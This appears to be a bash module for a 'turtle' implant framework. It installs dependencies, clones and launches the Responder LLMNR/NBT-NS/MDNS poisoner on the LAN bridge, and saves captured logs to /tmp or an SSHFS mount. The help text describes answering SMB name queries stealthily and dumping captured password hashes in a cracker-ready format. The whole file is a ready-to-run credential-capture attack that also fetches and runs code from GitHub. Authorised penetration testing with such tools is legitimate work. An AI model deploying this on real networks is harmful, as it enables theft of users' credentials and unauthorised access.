#!/bin/bash /usr/lib/turtle/turtle_module VERSION="1.0" DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner" CONF=/tmp/responder.form AUTHOR=IMcPwn : ${DIALOG_OK=0} : ${DIALOG_CANCEL=1} : ${DIALOG_HELP=2} : ${DIALOG_EXTRA=3} : ${DIALOG_ESC=255} function start { if [ ! -s /usr/bin/git ]; then opkg update && opkg install git fi if [ ! -s /usr/lib/python2.7/sqlite3/dbapi2.py ]; then opkg update && opkg install python-sqlite3 fi if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then rm -r /etc/turtle/Responder git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder fi if [ -s /etc/config/responder ]; then responder_log=$(uci get responder.log) case $responder_log in sshfs) if pgrep sshfs > /dev/null; then if [ -s /etc/turtle/Responder/Responder.db ]; then rm -r /etc/turtle/Responder/Responder.db fi if [[ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" ]]; then rm -r /etc/turtle/Responder/logs mkdir -p /sshfs/Responder/logs ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs fi echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now echo "Responder started and logs are being saved to /sshfs/Responder/logs" else echo "SSHFS not running" fi ;; tmp) if [ -s /etc/turtle/Responder/Responder.db ]; then rm -r /etc/turtle/Responder/Responder.db fi if [[ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" ]]; then rm -r /etc/turtle/Responder/logs mkdir -p /tmp/Responder/logs ln -s /tmp/Responder/logs /etc/turtle/Responder/logs fi echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now echo "Responder started and logs are being saved to /tmp/Responder/logs" ;; esac else echo "Responder not configured." fi } function stop { kill $(ps | grep -w [/]etc/turtle/Responder/Responder.py | awk {'print $1'}) } function status { if ps | grep -w -q [/]etc/turtle/Responder/Responder.py; then echo "1"; else echo "0"; fi } function configure { if [ -s /etc/config/responder ]; then responder_log=$(uci get responder.log) else touch /etc/config/responder fi dialog --ok-label "Submit" \ --help-button \ --title "Responder Configuration" \ --radiolist "\n\ For information on the different log files, see Help\n\nNOTICE: The first time you run this module it may take a long time to load because of dependencies. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3\ 1 "Save log to SSHFS if available." off\ 2 "Save log to /tmp/" off\ 2>$CONF return=$? case $return in $DIALOG_OK) LOG=$(cat $CONF) case $LOG in 1) uci set responder.log="sshfs" uci commit responder ;; 2) uci set responder.log="tmp" uci commit responder ;; esac ;; $DIALOG_CANCEL) rm $CONF clear exit;; $DIALOG_HELP) dialog --title "Help" \ --msgbox "\ Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\ By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\ The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\ All activity will be logged to Responder-Session.log\n\ Analyze mode will be logged to Analyze-Session.log\n\ Poisoning will be logged to Poisoners-Session.log\n\n\ All hashes are dumped an unique file John Jumbo compliant, using this format:\n\ (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt\n\n\ For more information, see: https://github.com/SpiderLabs/Responder\n\ " 25 60 configure ;; $DIALOG_ESC) clear;; esac }